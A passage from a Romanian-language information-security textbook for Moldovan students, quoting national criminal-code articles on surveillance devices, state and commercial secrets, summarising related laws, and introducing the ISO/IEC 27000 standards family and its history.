de la 3.000 la 6.000 unităţi convenţionale cu privarea de dreptul de a exercita o
anumită activitate.
Aici este necesar de menționat și Articolul 3011 al Codului penal, care spune:
Producerea, comercializarea sau procurarea în scop de comercializare a mijloacelor tehnice
speciale destinate pentru obţinerea ascunsă a informaţiei, săvârşite ilegal,

7
Aureliu Zgureanu. Bazele securității informaționale

se pedepsesc cu amendă în mărime de la 300 la 500 unităţi convenţionale sau cu


muncă neremunerată în folosul comunităţii de la 200 la 240 de ore, sau cu închisoare
de până la 3 ani, în toate cazurile cu (sau fără) privarea de dreptul de a ocupa anumite
funcţii sau de a exercita o anumită activitate pe un termen de la 1 la 3 ani, iar
persoana juridică se pedepseşte cu amendă în mărime de la 1000 la 3000 unităţi
convenţionale cu privarea de dreptul de a exercita o anumită activitate pe un termen
de la 1 la 3 ani.
În completare la aceasta vine Articolul 261 al codului Contravenţional al RM,
(1) Proiectarea sau producerea fără scop de comercializare, deţinerea sau utilizarea ilegală a
mijloacelor tehnice speciale pentru obţinerea ascunsă a informaţiei,
se sancţionează cu amendă de la 30 la 50 de unităţi convenţionale aplicată persoanei
fizice, cu amendă de la 100 la 200 de unităţi convenţionale aplicată persoanei cu
funcţie de răspundere, cu amendă de la 150 la 300 de unităţi convenţionale aplicată
persoanei juridice cu sau fără privarea de dreptul de a desfăşura o anumită activitate
pe un termen de la 6 luni la un an.

2.3. Secretul de stat și secretul comercial


2.3.1. Secretul de stat
Un loc special în legislație îl ocupă secretul de stat, care reprezintă informaţii protejate de
stat în domeniul apărării naţionale, economiei, ştiinţei şi tehnicii, relaţiilor externe, securităţii
statului, asigurării ordinii de drept şi activităţii autorităţilor publice, a căror divulgare neautorizată
sau pierdere este de natură să aducă atingere intereselor şi/sau securităţii Republicii Moldova.
Secretul de stat este reglementat de legea Nr. 245 din 27.11.2008 cu privire la secretul de stat
(http://lex.justice.md/md/330847/).
Articolul 344 al Codului penal prevede pedeapsa pentru divulgarea secretului de stat:
(1) Divulgarea informaţiilor ce constituie secret de stat de către o persoană căreia aceste
informaţii i-au fost încredinţate sau i-au devenit cunoscute în legătură cu serviciul sau
munca sa, dacă nu constituie trădare de Patrie sau spionaj,
se pedepseşte cu amendă în mărime de la 200 la 600 unităţi convenţionale sau cu
închisoare de până la 4 ani, în ambele cazuri cu privarea de dreptul de a ocupa
anumite funcţii sau de a exercita o anumită activitate pe un termen de până la 5 ani.
(2) Aceeaşi acţiune soldată cu urmări grave,
se pedepseşte cu închisoare de la 3 la 7 ani cu privarea de dreptul de a ocupa anumite
funcţii sau de a exercita o anumită activitate pe un termen de la 2 la 5 ani.

8
Aureliu Zgureanu. Bazele securității informaționale

Articolul 345 al Codului penal stipulează pedeapsa pentru pierderea documentelor ce conţin
secrete de stat:
Pierderea documentelor ce conţin secrete de stat, precum şi a obiectelor datele despre care
constituie secret de stat, de către o persoană căreia aceste documente sau obiecte i-au fost
încredinţate, dacă pierderea a fost un rezultat al încălcării regulilor stabilite de păstrare a
documentelor sau obiectelor menţionate şi a cauzat urmări grave,
se pedepseşte cu amendă în mărime de la 150 la 400 unităţi convenţionale sau cu
închisoare de până la 3 ani, în ambele cazuri cu privarea de dreptul de a ocupa
anumite funcţii sau de a exercita o anumită activitate pe un termen de până la 5 ani.
2.3.2. Secretul comercial sau bancar
Informaţiile ce nu constituie secret de stat, și care ţin de producţie, tehnologie, administrare,
de activitatea financiară şi de altă activitate a agentului economic, a căror divulgare (transmitere,
scurgere) poate să aducă atingere intereselor lui poartă denumirea de secret comercial. Informaţiile
ce constituie secret comercial sunt proprietate a agentului antreprenoriatului sau se află în posesia,
folosinţa sau la dispoziţia acestuia în limitele stabilite de el în conformitate cu legislaţia.
Articolul 24510 al Codului penal stipulează pedeapsa pentru obţinerea ilegală şi/sau
divulgarea informaţiilor ce constituie secret comercial sau bancar
(1) Colectarea de informaţii care constituie secret comercial sau bancar prin sustragerea de
informaţii, inclusiv folosirea mijloacelor tehnice speciale, extorcare sau ameninţarea cu
aplicarea violenţei nepericuloase pentru viaţa sau sănătatea persoanei,
se pedepseşte cu amendă în mărime de la 1000 la 4000 unităţi convenţionale sau cu
închisoare de la 1 la 6 ani, în ambele cazuri cu (sau fără) privarea de dreptul de a
ocupa anumite funcţii sau de a exercita o anumită activitate pe un termen de până la
3 ani.
(2) Divulgarea ilicită sau utilizarea informaţiilor ce constituie secret comercial sau bancar de
către persoana căreia i-a fost încredinţată sau i-a devenit cunoscută această informaţie în
virtutea atribuţiilor deţinute, fără consimţământul proprietarului informaţiei,
se pedepseşte cu amendă în mărime de la 1000 la 3000 unităţi convenţionale sau cu
închisoare de la 1 la 3 ani, în ambele cazuri cu (sau fără) privarea de dreptul de a
ocupa anumite funcţii sau de a exercita o anumită activitate pe un termen de până la
5 ani.
(3) Aceleaşi acţiuni care au cauzat daune în proporţii deosebit de mari,
se pedepsesc cu amendă în mărime de la 4000 la 5000 unităţi convenţionale sau cu
închisoare de la 2 la 5 ani, în ambele cazuri cu (sau fără) privarea de dreptul de a

9
Aureliu Zgureanu. Bazele securității informaționale

ocupa anumite funcţii sau de a exercita o anumită activitate pe un termen de la 2 la 5


ani.

2.4. Alte acte legislative conexe securității informaționale


În continuare sunt relatate pe scurt unele legi, adoptate de către Parlamentul RM, care au un
impact direct cu procesul de asigurare a securității informaționale.

2.4.1. Legea cu privire la informatizare şi la resursele informaţionale de stat


Legea cu privire la informatizare şi la resursele informaţionale de stat
(http://lex.justice.md/md/313189/) stabileşte regulile de bază şi condiţiile de activitate în domeniul
creării şi dezvoltării infrastructurii informaţionale naţionale ca mediu de funcţionare al societăţii
informaţionale din Republica Moldova, reglementează raporturile juridice care apar în procesul de
creare, formare şi utilizare a resurselor informaţionale automatizate de stat, a tehnologiilor,
sistemelor şi reţelelor informaţionale. Sub incidenţa acestei legi nu cad raporturile care apar la
crearea şi funcţionarea mijloacelor de informare în masă, resurselor informaţionale nestatale, la
prelucrarea informaţiei nedocumentate.

2.4.2. Legea comunicaţiilor electronice


Legea comunicaţiilor electronice (http://lex.justice.md/md/327198/) stabileşte principalele
reguli şi condiţii de activitate în domeniul comunicaţiilor electronice din Republica Moldova, cadrul
general al politicii şi strategiei de dezvoltare a domeniului, prin definirea atribuţiilor autorităţii
centrale de specialitate, cadrul general de reglementare a activităţilor privind reţelele şi serviciile de
comunicaţii electronice, prin definirea atribuţiilor şi obiectivelor autorităţii de reglementare,
drepturile şi obligaţiile statului, ale persoanelor fizice şi juridice în procesul creării, gestionării şi
utilizării reţelelor de comunicaţii electronice, în scopul asigurării utilizatorilor cu servicii de
comunicaţii electronice de calitate, moderne şi utile, la preţuri rezonabile, precum şi al asigurării
accesului liber la serviciile publice de comunicaţii electronice.
Această lege reglementează activitatea în domeniul comunicaţiilor electronice civile a
tuturor furnizorilor de reţele şi/sau servicii de comunicaţii electronice, indiferent de tipul lor de
proprietate, şi stabileşte drepturile şi obligaţiile utilizatorilor pe întreg teritoriul Republicii Moldova.
Acţiunea Legii comunicaţiilor electronice nu se extinde asupra reţelelor de comunicaţii speciale,
crearea şi funcţionarea acestor reţele fiind reglementată de către Guvern. De asemenea această lege
nu reglementează conţinutul informaţiei transmise prin reţelele de comunicaţii electronice, cu
excepţia informaţiei care identifică utilizatorul final.

10
Aureliu Zgureanu. Bazele securității informaționale

2.4.3. Legea privind protecţia datelor cu caracter personal


Legea privind protecţia datelor cu caracter personal (http://lex.justice.md/md/340495/)
creează cadrul juridic necesar aplicării Directivei 95/46/CE a Parlamentului European şi a
Consiliului din 24 octombrie 1995 privind protecţia persoanelor fizice în ceea ce priveşte
prelucrarea datelor cu caracter personal şi libera circulaţie a acestor date.
Scopul acestei legi este asigurarea protecţiei drepturilor şi libertăţilor fundamentale ale
persoanei fizice în ceea ce priveşte prelucrarea datelor cu caracter personal, în special a dreptului la
inviolabilitatea vieţii intime, familiale şi private.
Prezenta lege reglementează relaţiile juridice care apar în procesul de prelucrare a datelor cu
caracter personal ce fac parte dintr-un sistem de evidenţă sau care sunt destinate să fie incluse într-
un asemenea sistem, efectuată în totalitate sau în parte prin mijloace automatizate, precum şi prin
alte mijloace decât cele automatizate.
Domeniul de acţiune al prezentei legi se extinde asupra:
a) prelucrării datelor cu caracter personal efectuate în cadrul activităţilor desfăşurate de
operatori aflaţi pe teritoriul Republicii Moldova;
b) prelucrării datelor cu caracter personal efectuate în cadrul misiunilor diplomatice şi
oficiilor consulare ale Republicii Moldova, precum şi de către alţi operatori aflaţi în
afara teritoriului ţării, dar pe teritorii în care se aplică dreptul intern al Republicii
Moldova, în temeiul dreptului internaţional public;
c) prelucrării datelor cu caracter personal efectuate de operatori aflaţi în afara teritoriului
Republicii Moldova, cu utilizarea mijloacelor aflate pe teritoriul Republicii Moldova, cu
excepţia cazului în care aceste mijloace nu sunt utilizate decât în scopul tranzitării pe
teritoriul Republicii Moldova a datelor cu caracter personal care fac obiectul prelucrării
respective;
d) prelucrării datelor cu caracter personal în cadrul acţiunilor de prevenire şi investigare a
infracţiunilor, punerii în executare a sentinţelor de condamnare şi al altor acţiuni din
cadrul procedurii penale sau contravenţionale în condiţiile legii.
Prevederile prezentei legi sunt aplicabile persoanei împuternicite de către operator, fără a
exclude dreptul de a intenta acţiune în justiţie împotriva operatorului.
Domeniul de acţiune al prezentei legi nu se extinde asupra:
a) prelucrării datelor cu caracter personal efectuate de către operatori exclusiv pentru nevoi
personale sau familiale, dacă prin aceasta nu se încalcă drepturile subiecţilor datelor cu
caracter personal;

11
Aureliu Zgureanu. Bazele securității informaționale

b) prelucrării datelor cu caracter personal atribuite la secret de stat în modul stabilit, cu


excepţia celor indicate la alin. (2) lit. d);
c) operaţiunilor de prelucrare şi transmitere transfrontalieră a datelor cu caracter personal
ce se referă la făptuitorii sau victimele crimelor de genocid, ale crimelor de război şi ale
crimelor împotriva umanităţii.

2.4.4. Legea privind prevenirea şi combaterea criminalităţii informatice


Legea privind prevenirea şi combaterea criminalităţii informatice
(http://lex.justice.md/md/333508/) reglementează raporturile juridice privind:
a) prevenirea şi combaterea infracţiunilor informatice;
b) cadrul de asistenţă mutuală în prevenirea şi combaterea criminalităţii informatice, în
protecţia şi acordarea de ajutor furnizorilor de servicii şi utilizatorilor de sisteme
informatice;
c) colaborarea autorităţilor administraţiei publice cu organizaţii neguvernamentale şi cu alţi
reprezentanţi ai societăţii civile în activitatea de prevenire şi de combatere a
criminalităţii informatice;
d) cooperarea cu alte state, cu organizaţii internaţionale şi regionale având competenţe în
domeniu.

2.4.5. Legea privind accesul la informaţie


Legea privind accesul la informaţie (http://lex.justice.md/md/311759/), reglementează:
a) raporturile dintre furnizorul de informaţii şi persoana fizică si/sau juridică în procesul de
asigurare şi realizare a dreptului constituţional de acces la informaţie;
b) principiile, condiţiile, căile şi modul de realizare a accesului la informaţiile oficiale,
aflate în posesia furnizorilor de informaţii;
c) drepturile solicitanţilor informaţiei;
d) obligaţiile furnizorilor de informaţii în procesul asigurării accesului la informaţiile
oficiale;
e) modalitatea apărării dreptului de acces la informaţie.
Nu constituie obiect al acestei legi raporturile care se referă la colectarea, prelucrarea,
depozitarea şi garantarea integrităţii informaţiilor, prezentarea obligatorie a informaţiilor prevăzute
de lege de către persoane private autorităţilor publice, instituţiilor publice, accesul autorităţilor
publice, instituţiilor publice, persoanelor fizice şi/sau juridice, abilitate cu gestionarea unor servicii
publice, la informaţiile aflate în posesia altor asemenea autorităţi publice, instituţii publice,

12
Aureliu Zgureanu. Bazele securității informaționale

persoane fizice şi/sau juridice, furnizarea informaţiilor referitoare la propria activitate de către
persoane fizice şi juridice private, partide şi formaţiuni social-politice, fundaţii, asociaţii obşteşti.
Legea privind accesul la informaţie are drept scop:
a) crearea cadrului normativ general al accesului la informaţiile oficiale;
b) eficientizarea procesului de informare a populaţiei şi a controlului efectuat de către
cetăţeni asupra activităţii autorităţilor publice şi a instituţiilor publice;
c) stimularea formării opiniilor şi participării active a populaţiei la procesul de luare a
deciziilor în spirit democratic.

2.4.6. Legea privind semnătura electronică şi documentul electronic


Legea privind semnătura electronică şi documentul electronic
(http://lex.justice.md/md/353612/) creează cadrul necesar aplicării Directivei nr. 1999/93/CE a
Parlamentului European şi a Consiliului din 13 decembrie 1999 privind un cadru comunitar pentru
semnăturile electronice, publicată în Jurnalul Oficial al Comunităţilor Europene nr. L 13 din 19
ianuarie 2000.
Scopul legii şi domeniul de aplicare
(1) Prezenta lege stabileşte regimul juridic al semnăturii electronice şi al documentului
electronic, inclusiv cerinţele principale faţă de valabilitatea acestora şi cerinţele
principale faţă de serviciile de certificare.
(2) Prezenta lege nu limitează modul de utilizare a documentelor.
(3) Recunoaşterea semnăturii electronice şi a documentului electronic în afara Republicii
Moldova este reglementată de tratatele internaţionale la care Republica Moldova este
parte. În cazul în care tratatele internaţionale la care Republica Moldova este parte
stabilesc alte norme decât cele prevăzute de prezenta lege, se aplică normele tratatelor
internaţionale.

2.5. Concepţia securităţii informaţionale a Republicii Moldova


Cu regret, la momentul publicării acestui manual încă nu a fost adoptată Concepţia
securităţii informaţionale a Republicii Moldova, ea fiind aprobată de Guvernul RM și votată în
Parlamentul RM în lectura întâi în iunie 2017, fiind propuse diverse modificări la proiectul inițial.
În conformitate cu proiectul, Concepţia securităţii informaţionale a Republicii Moldova
reprezintă un sistem integrat de opinii referitoare la scopurile, sarcinile, principiile şi direcţiile de
bază ale activităţii de asigurare a nivelului necesar de securitate informaţională şi de protecţie a
informaţiei în Republica Moldova. Conform proiectului acestei Concepţii, asigurarea securității

13
Aureliu Zgureanu. Bazele securității informaționale

informaţionale şi protecţia informaţiei se consideră drept părţi componente ale sistemului naţional
de securitate.
Concepţia securităţii informaţionale a Republicii Moldova va servi drept bază pentru
elaborarea legislației Republicii Moldova, inclusiv a politicii de stat, în domeniul asigurării
securităţii informaţionale, pentru asigurarea coordonării și sporirii nivelului de eficiență a activităţii
autorităţilor administraţiei publice şi a altor organizaţii din sectorul public și privat, pentru
elaborarea programelor speciale de asigurare a securităţii informaţionale, precum şi pentru crearea
unui sistem unic de protecţie a informaţiei ce întruneşte măsurile legale, organizatorice, tehnice,
tehnologice şi fizice de protecţie.
Concepţia are drept scopuri principale crearea sistemului de asigurare a securităţii
informaţionale în Republica Moldova, sporirea nivelului de securitate informaţională a statului în
ansamblu şi perfecţionarea în continuare a cadrului legislativ privind securitatea informaţională,
fundamentată de prevederile Constituţiei Republicii Moldova, Concepţiei securităţii naţionale şi
Strategiei de securitate naţională. Concepţia determină scopurile, principiile şi sarcinile de activitate
a organelor administraţiei publice în asigurarea securităţii informaţionale, componentele de bază ale
securităţii informaţionale, ameninţări principale şi metodele de prevenire a acestora.
În final trebuie de menționat că cadrul juridic are o importanță primordială în asigurarea
unui nivel înalt de protecție a informației, iar pentru un specialist din domeniul tehnologiilor
informaționale este necesar să fie la curent cu legislația actualizată ce ține de acest domeniu. În
același timp legislația stabilește modul în care vor fi pedepsiți cei care comit infracțiuni cibernetice,
de aceea nu sunt mai puțin importante și standardele și specificațiile care reglementează lucrul
activitățile unui specialist în domeniul securității informaționale, dar și a oricărui specialist IT, care
este un subiect important în dezvoltarea sistemelor informatice.

Întrebări și subiecte pentru aprofundarea cunoștințelor și lucrul individual


1. Care sunt actele legislative ale RM care vizează măsurile cu scop restrictiv de
asigurarea a securității informației? Exemplificați prin evidențierea a 3 articole
relevante din aceste acte.
2. Descrieți o situație în care măsurile legislative pot contribui la sporirea nivelului de
securitate a informației în cadrul unei întreprinderi sau organizații.
3. Realizați o analiză statistică la nivel global a infracțiunilor informatice comise în
ultimii 2 ani. Care dintre domeniile de activitate a omului sunt cele mai afectate de
astfel de infracțiuni?
4. Estimați rolul Concepției securității informaționale a statului în contextul etapei
moderne de activitate cibernetică infracțională.

14
“Tehnicile de securitate standardizate devin cerinţe
obligatorii pentru comerţul electronic, mediul sanitar,
telecomunicaţii, sectorul auto și multe alte domenii
industriale, comerciale sau guvernamentale.”
Prof. Edward Humphreys

TEMA 3: STANDARDE ÎN DOMENIUL SECURITĂȚII INFORMAȚIEI

Obiectivele temei:
 Introducere în noțiunile de bază ale standardizării.
 Prezentarea evoluției standardelor de securitate.
 Caracterizarea generală a standardelor din familia ISO/IEC 27000.

Cuvinte-cheie:
standardizare,
ISO/IEC,
ISO27k,
sistem de management a
securității informației,
cod de bună practică,
tehnici de securitate,
audit şi certificare,
managementul
inciedntelor de securitate,
managementul riscului
securităţii informaţiei.
AC ADEMIA DE STUDII ECONOMICE A MOLDOVEI

Prof. Edward Humphreys, unul dintre responsabilii pentru elaborarea multor dintre
standardele de securitate a spus: “Tehnicile de securitate standardizate devin cerinţe obligatorii
pentru comerţul electronic, mediul sanitar, telecomunicaţii, sectorul auto și multe alte domenii
industriale, comerciale sau guvernamentale.” Cuvintele sale au fost confirmate de-a lungul timpului
de experiența avută după implementarea acestor standarde, ele având un impact major în procesul
de asigurare a securității informațiilor în diversele domenii de activitate umană.
3.1. Introducere în standardizare
Securitatea informațiilor joacă un rol important în protejarea activelor unei organizații, însă
deoarece nu există o formulă unică care poate garanta 100% securitatea, este nevoie de un set de
criterii, reguli sau standarde pentru a contribui la asigurarea atingerii unui nivel adecvat de
securitate, la utilizarea resurselor în mod eficient, la adoptarea celor mai bune practici de securitate.
Rolul primordial în elaborarea standardelor îi revine Organizației Internaționale pentru
Standardizare (ISO), care împreună cu Comisia Internațională Electrotehnică (IEC) formează un
sistem internațional specializat pentru standardizarea mondială. Organismele naționale care sunt
membre ale ISO și IEC participă la dezvoltarea standardelor internaționale prin intermediul
comitetelor tehnice. Astfel, Statele Unite ale Americii, prin intermediul Institutului Național de
Standardizare (ANSI), ocupă poziția de Secretar, 24 de țări au statut de Participanți (Brazilia,
Franța, Regatul Unit al Marii Britanii, Coreea, Cehia, Germania, Danemarca, Belgia, Portugalia,
Japonia, Olanda, Irlanda, Norvegia, Africa de Sud, Australia, Canada, Finlanda, Suedia, Slovenia,
Elveția, Noua Zeelandă și Italia) și alte 40 de țări au statut de Observatori.
În conformitate cu ISO “standardul reprezintă documentul stabilit prin consens şi aprobat
de către un organism recunoscut, care furnizează pentru utilizări comune şi repetate, reguli, linii
directoare (guidelines) sau caracteristici pentru activităţi sau rezultatele lor, în scopul realizării
unui grad optim de ordine într-un context dat”. Aceasta definiție este bazată pe rolul și scopul
standardelor în lume la etapa modernă și stabilește importanța standardelor pentru orice organizație
sau companie, plasându-le, alături de reglementările tehnice, în rândul documentelor de referință
care trebuie să stea la baza politicilor și practicilor acestora.
Standardul, este cea mai buna și cea mai simplă cale posibila pentru a comunica, pentru a
cunoaște nivelul tehnic unanim acceptat pe plan național, european sau internațional în domeniul de
activitate al oricărei companii sau organizații și nu în ultimul rând, pentru proiectarea și dezvoltarea
practicilor de management.
Mii de astfel de standarde sunt disponibile tuturor companiilor sau organizațiilor care,
datorită limbajului comun al standardizării, le pot utiliza pentru a fi competente, competitive,
participante active fără dificultăți în comunicare pe piață aleasă ca țintă în activitate.

Tehnologii Informaționale 2
AC ADEMIA DE STUDII ECONOMICE A MOLDOVEI

Legile, reglementările tehnice și prevederile administrative au caracter obligatoriu.


Cunoașterea și respectarea lor ajută la evoluția societăților comerciale pe piață. Standardele
naționale, europene și internaționale, standardele profesionale sau de firmă pot fi aplicate prin
asumarea voluntară. Decizia aplicării unui standard sau standarde aparținând unui organism de
standardizare se ia având în vedere piața căreia i se adresează produsul, capacitatea tehnică
disponibilă de realizare a prevederilor din standardele relevante pentru un anumit produs sau proces,
nivelul tehnic, propria activitate de cercetare, proiectare de produse noi, îndreptată în scopul
ocupării unei poziții superioare în piață sau pentru pătrunderea pe noi piețe.
Cunoașterea și respectarea standardelor asigură competența societăților comerciale, fiind un
factor determinant al succesului activității în cadrul unei piețe unice.
Noțiunea de voluntariat presupune asumarea pe proprie răspundere a aplicării standardelor,
fapt care ridică pe un plan superior responsabilitatea managementului, a actului de concepție,
proiectare, realizare și comercializare a produsului.
Standardele pot să joace și un rol important în legislație, în special, în reglementările
tehnice. Daca un legislator include standardele într-un document legal sau face referințe la ele într-
un fel sau altul, standardele obțin o calitate legala. Astfel standardele devin o parte a cerințelor unui
anumit document legislativ sau unui anumit sistem.
La fel ca oricare altele, standardele pentru asigurarea securității sistemelor informatice devin
esențiale în astfel de circumstanțe. Standardele pot defini sfera de aplicare a funcțiilor și
caracteristicilor de securitate necesare, politicile de gestionare a informațiilor și a resurselor umane,
criteriile de evaluare a eficacității măsurilor de securitate, tehnicile pentru evaluarea continuă a
securității și monitorizarea continuă a încălcărilor securității și procedurile de tratare a securității
eșecuri.
3.2. Evoluția standardelor de securitate
Cele mai bune practici necesare pentru crearea, dezvoltarea și întreținerea sistemelor de
management al securității informației (SMSI) pentru o bună activitate a întreprinderilor sunt incluse
în familia (seria) de standarde ISO27k (sau ISO/IEC 27000), care conține la momentul actual nu mai
puțin de 40 de standarde publicate, altele fiind în proces de elaborare sau sunt planificate pentru a fi
elaborate ulterior (https://www.iso.org/committee/45306/x/catalogue/). Aceste standarde de
securitate sunt publicate în comun de către Organizaţia Internaţională pentru Standardizare şi
Comisia Electrotehnică Internaţională. Ele sunt produsul activității comitetului ISO/IEC JTC1,
subcomitetului SC27, o comisie internaţională membrii căreia se întrunesc de două ori pe an.
Seria are un domeniul larg de aplicare, care acoperă problemele conexe triadei CIA dar și
problemele de securitate tehnice sau IT. Aceste standarde se aplică pentru toate organizaţiile

Tehnologii Informaționale 3
AC ADEMIA DE STUDII ECONOMICE A MOLDOVEI

indiferent de forme şi mărimi. Toate organizaţiile sunt încurajate să îşi evalueze riscurile de
securitate a informaţiilor și apoi să le trateze (de regulă, folosind controalele de securitate a
informațiilor), în funcţie de nevoile lor, folosindu-se de îndrumări şi sugestii acolo unde este cazul.
Având în vedere natura dinamică a informaţiilor care trebuie protejate, SMSI încorporează un
concept continuu de feedback şi îmbunătăţire a activităţilor conform ciclului Deming PDCA (Plan-
Do-Check-Act sau Planifică-Implementează-Verifică-Acţionează) de abordare continuă, care caută
să abordeze schimbările în ameninţări, vulnerabilităţi de informaţii sau de impact asupra
incidentelor de securitate.
Standardele de securitate a informației își trag rădăcinile de la sfârșitul anilor 80 ai secolului
trecut, când compania olandezo-britanică Royal Dutch Shell elaborează un documentul intern -
Information Security Policy Manual.
În 1989 UK DTI CCSC (UK Department of Trade and Industry’s Commercial Computer
Security Centre), folosind ca bază documentul celor de la Shell, a elaborat și publicat ghidul pentru
securitatea informației pentru membrii săi - User’s Code of Practice. CCSC a scris, de asemenea și
Cartea verde (The Green Books), care fiind susținută de UK Government’s Communications
Electronics Security Group (CESG) a fost transformată în standardul ITSEC.
În 1993 același UK DTI CCSC prin intermediul British Standards Institution (BSI) a lansat
un document gratuit BSI-DISC PD003 - DTI Code of Practice for Information Security
Management).
În 1995 BSI a adoptat acest cod de practica a securității informației ca standard național al
Mari Britanii cu numărul BS 7799 - Code of Practice for Information Security Management. După
cum sugerează și numele, acest document oferă îndrumări practice privind managementul securității
informațiilor într-o organizație. El descrie 10 domenii și 127 mecanisme de control, necesare pentru
elaborarea unui sistem de management al securității informației, definite pe baza celor mai bune
exemple din practica mondială a timpului.
În 1998 Standardul BS 7799 este redenumit BS 7799 Partea 1, în legătură cu elaborarea
părții a doua: BS 7799 Part 2 Information Security Management Systems - Specification with
guidance for use. În acest standard a fost introdusă procedura de îmbunătățire a măsurilor de
securitate în conformitate cu ciclul Deming.
În 1999, după revizuire, standardul BS 7799-1 a fost emis din nou (cu modificări) și
transferat către Organizația Internațională de Standardizare, iar un an mai târziu Comitetul Tehnic
ISO a adoptat BS 7799-1 fără amendamente ca de standard internațional ISO/IEC 17799: 2000.
A doua parte a BS 7799 a fost revizuită în 2002, iar la sfârșitul anului 2005 a fost adoptat ca
standard internațional ISO/IEC 27001:2005 - Tehnologia Informației - Tehnici de securitate -

Tehnologii Informaționale 4
AC ADEMIA DE STUDII ECONOMICE A MOLDOVEI

Sisteme de management al securității informației - Cerințe. Odată cu lansarea ISO/IEC 27001


specificațiile SMSI au dobândit un statut internațional, iar de atunci s-a atestat o creștere
semnificativă a rolului și prestigiului SMSI certificate în conformitate cu standardul ISO 27001. În
același an 2005 standardul ISO/IEC 17799 a fost inclus în gama de standarde 27k cu numărul
ISO/IEC 27002: 2005. De fapt, din 2005 își începe existență gama de standarde internaționale ISO
27k.
La începutul anului 2006, a fost adoptat noul standard național britanic BS 7799-3 -
Information security management systems - Guidelines for information security risk management în
domeniul administrării riscurilor de securitate a informației, care în anul 2008 a fost aprobat ca
standard ISO/IEC 27005.
3.3. Familia de standarde ISO/IEC 27000
În continuare vom analiza cu unele detalii câteva standarde din familia ISO/IEC 27000, în
special acelea care au alcătuit piatra de temelie a acestei familii la debutul ei.
3.3.1. ISO/IEC 27000:2016
ISO/IEC 27000:2016, Tehnologia informaţiei - Tehnici de securitate - Sisteme de
management al securităţii informaţiei - Prezentare generală şi vocabular.
Acest standard oferă o imagine de ansamblu a sistemelor de management al securităţii
informaţiei ce fac obiectul familiei de standarde şi defineşte termenii din domeniu.
Un sistem de management al securităţii informaţiei reprezintă o abordare sistematică a
managementului informaţiei astfel încât aceasta să îndeplinească cele 3 aspecte ale securităţii:
confidenţialitatea, integritatea şi disponibilitatea. Sistemul de management al securităţii informaţiei
implică atât echipamentele hardware şi procesele software, cât şi întregul personal al unei orga-
nizaţii ce are acces la sistemul informaţional.
Ca rezultat al implementării standardului ISO/IEC 27000:2016, toate tipurile de organizaţii
(de exemplu societăţile comerciale, agenţiile guvernamentale sau organizaţiile non-profit) pot
obţine:
 o imagine de ansamblu asupra familiei ISMS de standarde;
 o introducere în sistemele de management al securităţii informaţiei;
 o scurtă descriere a procesului PDCA;
 o înţelegere a termenilor şi definiţiilor utilizate în întreaga familie ISMS de standarde.
Standardul ISO/IEC 27000:2016 împreună cu standardele din familia ISO/IEC 27000 are
scopul de a ajuta organizaţiile să obţină un nivel cât mai ridicat al securităţii informaţionale.
Obiectivele standardului ISO/IEC 27000:2016 sunt de a oferi termeni, definiţii şi o introducere în
familia de standarde SMSI care:

Tehnologii Informaționale 5
AC ADEMIA DE STUDII ECONOMICE A MOLDOVEI

 definesc cerinţele pentru sistemele de management a securităţii informaţiei şi pentru cele


care certifică aceste sisteme;
 oferă suport, îndrumare detaliată şi/sau interpretare a cerinţelor şi proceselor PDCA;
 oferă îndrumări pentru secţiunile specifice din familia ISMS de standarde;
 oferă evaluări pentru familia ISMS.
3.3.2. ISO/IEC 27001:2013
ISO/IEC 27001:2013, Tehnologia informaţiei - Tehnici de securitate - Specificaţii ale
sistemelor de management al securităţii informaţiei.
Standardul ISO/IEC 27001:2013 (fostul BS 7799-2:2002) specifică cerinţele pentru
stabilirea, implementarea, operarea, monitorizarea, revizuirea, menţinerea şi îmbunătăţirea unui
sistem de management al securităţii informaţiei documentat în contextul riscurilor generale de
afaceri ale organizaţiilor. Acest standard specifică cerinţele pentru implementarea unor mijloace de
control de securitate personalizate nevoilor organizaţiilor.
ISO/IEC 27001:2013 este menit să asigure o selecţie de mijloace de control de securitate
adecvate ce protejează informaţiile şi oferă încredere părţilor interesate.
Este potrivit pentru diferite tipuri de utilizare, inclusiv pentru:
 formularea obiectivelor şi cerinţelor de securitate a organizaţiilor;
 asigurarea că riscurile de securitate sunt gestionate în mod eficient din punct de vedere al
costului;
 asigurarea unei conformităţi cu legislaţia şi diverse reglementări;
 implementarea şi gestionarea proceselor existente de management al securităţii
informaţiei;
 definirea de noi procese de management al securităţii informaţiei;
 identificarea şi clarificarea proceselor existente de management al securităţii informaţiei;
 utilizarea lui de către conducerea organizaţiilor pentru a determina starea activităţilor de
management al securităţii informaţiei;
 utilizarea de către auditorii interni şi externi ai organizaţiilor pentru a determina gradul
de conformitate cu politicile, directivele şi standardele adoptate de către organizaţie;
 furnizarea de informaţii relevante despre politicile de securitate a informaţiei,
directivele, standardele şi procedurile către partenerii comerciali şi alte organizaţii cu
care organizaţia interacţionează, din motive operaţionale sau comerciale;
 punerea în aplicare a afacerii, activând securitatea informaţiei;
 furnizarea de informaţii relevante despre securitatea informaţiei clienţilor organizaţiei.
3.3.3 ISO/IEC 27002:2013

Tehnologii Informaționale 6
AC ADEMIA DE STUDII ECONOMICE A MOLDOVEI

ISO/IEC 27002:2013, Tehnologia informației - Tehnici de securitate - Cod de bună practică


pentru managementul securității informației.
Standardul ISO/IEC 27002:2013 este fostul standard ISO/IEC 17799:2005 căruia i s-a
schimbat numele pentru a face parte din seria ISO 27000 dedicată securităţii informaţiei. Stabileşte
principiile generale pentru iniţierea, implementarea, menţinerea şi îmbunătăţirea managementului
securităţii informaţiei într-o organizaţie.
Obiectivul său este să furnizeze indicaţii generale privind obiectivele general acceptate în
managementul securităţii informaţiilor. Standardul ISO/IEC 27002:2013 conţine cele mai bune
practici de control în următoarele domenii de management al securităţii informaţiei:
 politica de securitate;
 organizarea securităţii informaţiei;
 managementul activelor;
 securitatea resurselor umane;
 securitatea fizică şi a mediului înconjurător;
 managementul comunicaţiilor şi al operaţiilor;
 controlul accesului;
 achiziţionarea sistemelor informaţionale, dezvoltarea şi mentenanţa lor;
 managementul incidentelor de securitate a informaţiilor;
 managementul afacerii continue.
Obiectivele de control în standardul ISO/IEC 27002:2013 sunt destinate să fie puse în
aplicare pentru a îndeplini cerinţele identificate printr-o evaluare a riscului. Standardul este
conceput ca un ghid practic pentru dezvoltarea standardelor de securitate organizaţională şi
practicele efective de management al securităţii şi pentru a ajuta la construirea încrederii în activităţi
inter-organizaţionale.
Standardul poate fi utilizat ca referință în alegerea mijloacelor de control în cadrul
proceselor de implementare a unui sistem de management al securității informației (SMSI) sau ca
document de îndrumare pentru organizațiile care implementează mijloace de control de securitate a
